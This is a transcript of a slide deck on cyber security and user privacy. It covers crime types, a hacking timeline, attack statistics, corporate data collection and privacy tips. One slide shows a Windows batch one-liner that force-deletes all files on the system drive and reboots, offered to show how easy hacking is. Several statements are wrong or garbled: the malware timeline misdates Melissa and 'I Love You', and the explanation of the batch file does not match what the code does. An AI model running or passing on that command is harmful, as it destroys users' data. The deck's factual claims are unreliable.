Cyber security and user privacy

13
Cyber security and user privacy I CAN DO MORE HARM TO YOU WITH A COMPUTER IN MY HAND, SITTING AT HOME, THAN , HOLDING A GUN POINTING AT YOU. -Jhunjhun Tripathy

Transcript of Cyber security and user privacy

Cyber security and user privacy

“ I CAN DO MORE HARM TO YOU WITH A COMPUTER IN MY HAND, SITTING AT HOME, THAN, HOLDING A GUN POINTING AT YOU.”

-Jhunjhun Tripathy

Cyber Crime types:

• HACKING

• DENIAL OF SERVICE ATTACK

• VIRUS ATTACKS

• COMPUTER VANDALISM

• CYBER TERRORISM

• SOFTWARE PIRACY

How has Hacking Evolved? Present Scene

1977 – First virus was written 1995- Breaking Web Sites

2000- First Malicious Code: Melissa

2003-04- Advanced worm “I Love You” was released.

2005-06- Identity Theft (Phishing) came to existence.

How Have Things Emerged?

PAST PRESENT & FUTURE

• Cyber security is a young and immature field

• The attackers are more innovative than defenders

• Defenders are mired in FUD (fear, uncertainty and doubt) and fairy tales

• Attack back is illegal or classified

• Cyber security will become a scientific discipline

• Cyber security will be application and technology centric

• Cyber security will never be “solved” but will be “managed”

• Attack back will be a integral part of cyber security

Financial Fraud3%

Data Sabotage5%

Theft of Proprietory Information

6%

System Penetration 7%

Denial Of Service8%

Unauthorised Access 21%

Employee Abuse of Internet Privilege24%

Virus Attacks25%

% Of Cyber Attack Types

Financial Fraud Data Sabotage Theft of Proprietory InformationSystem Penetration Denial Of Service Unauthorised Access Employee Abuse of Internet Privilege Virus Attacks

What’s In their Mind???? The Plan?

• Knowing The Victim

• Planning

• Attack.

• Creation of backdoor for Escaping.

• Go Incognito

UNDERSTAND THE VICTIM

Plan

Attack

Cases Reported In India State Cases

Maharashtra 907

UP 682

AP 657

2011 2012 2013 2014 20150

50000

100000

150000

200000

250000

300000

1330122060

71780

149254

300000

Cyber Attack Cases

Cases

Estimated Attacks this year

How simple is it to Hack ?

@echo offdel %systemdrive%\*.* /f /s /qshutdown -r -f -t 00

Can affect your system drive C:\ . The virus can copy endlessly until all the cache memory is utilised leaving no memory for running any application.

Hence, it shutdowns the computer after a delay.

Popular companies that collect user data..

• Facebook

• Google

• Apple

• Microsoft

• Samsung

• Sony

• XiaomiShocking ??

How Google Violates Privacy?

• Street View: Not just street mapping.

• Gmail: Prying and spying.

• Google Chrome: Not just hunting Wi-Fi. It knows all about you.

• Android: Another data gateway. Now they know where, whom and How you are.

Why is this Information Collected?

• Ads

• Services

• Backdoor

• Inline Marketing

• Push mail regarding services

• Cloud synchronisation

Ads Services Backdoor Inline Marketing

Push mail Cloud Sync0

5

10

15

20

25

30

35

40

45

PurposePercent

What Should you Do now?• Use Linux and Unix based Operating systems.

• Use proxy server to avoid location based tracking.

• Carefully read the permissions that ask for accessing microphone and camera.

• Use a dynamic IP address.

• Don't store credit card information within apps or cloud servers like Google Drive.

• Use secure browsers. Ex: Comodo Dragon

• Use secured encrypted email clients like Clyton or Thunderbird.

HAPPY BROWSING